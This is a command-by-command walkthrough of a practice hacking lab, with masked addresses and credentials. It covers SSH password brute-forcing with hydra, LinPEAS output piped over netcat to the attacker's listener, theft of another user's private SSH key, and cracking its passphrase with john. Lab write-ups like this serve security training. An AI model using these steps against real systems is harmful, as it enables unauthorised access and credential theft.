This is a machine that allows you to practise web app hacking and privilege escalation
Title | Target IP |
---|---|
Web App Test | 1*.**.*.*** |
In these set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
nmap -sC -sV -oN nmap 1*.**.*.***
22/tcp
O***SSH80/tcp
A*****138/tcp
S****445/tcp
S****8009/tcp
A*****8080/tcp
A*****
View Page Source: http://1*.**.*.***
<!-- Check our dev note section if you need to know what to work on. -->
gobuster dir -u http://1*.**.*.***/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -t 100
/d********** (Status: 301) [Size: 316] [--> http://1*.**.*.***/d**********/]
View Page Source: http://1*.**.*.***/d**********/
href="dev.txt"
href="j.txt"
Go to: http://1*.**.*.***/d**********/dev.txt
Go to: http://1*.**.*.***/d**********/j.txt
enum4linux 1*.**.*.*** | tee enum4linux
S-1-22-1-1000 Unix User\k** (Local User)
S-1-22-1-1001 Unix User\j** (Local User)
hydra -l j** -P /usr/share/wordlists/rockyou.txt ssh://1*.**.*.***
[22][ssh] host: 1*.**.*.*** login: j** password: a******
Using: LinPEAS
Using: j**:a******
scp /opt/linpeas/linpeas.sh j**@1*.**.*.***:/dev/shm
nc -lvnp 9000 | tee linpeas
ssh j**@1*.**.*.***
RHOST:
cd /dev/shm
chmod 700 linpeas.sh
./linpeas.sh -a -e | nc 1*.**.**.** 9000
══╣ Possible private SSH keys were found! /home/k**/.ssh/id_rsa
cat /home/k**/.ssh/id_rsa
- Copy
LHOST:
cat > k**_id_rsa
- Paste
ctrl
+d
(2x)
ssh2john k**_id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
b****** (k**_id_rsa)
chmod 600 k**_id_rsa
Using: k**:b******
ssh -i k**_id_rsa k**@1*.**.*.***
RHOST:
cat pass.bak
h*****************************************************$$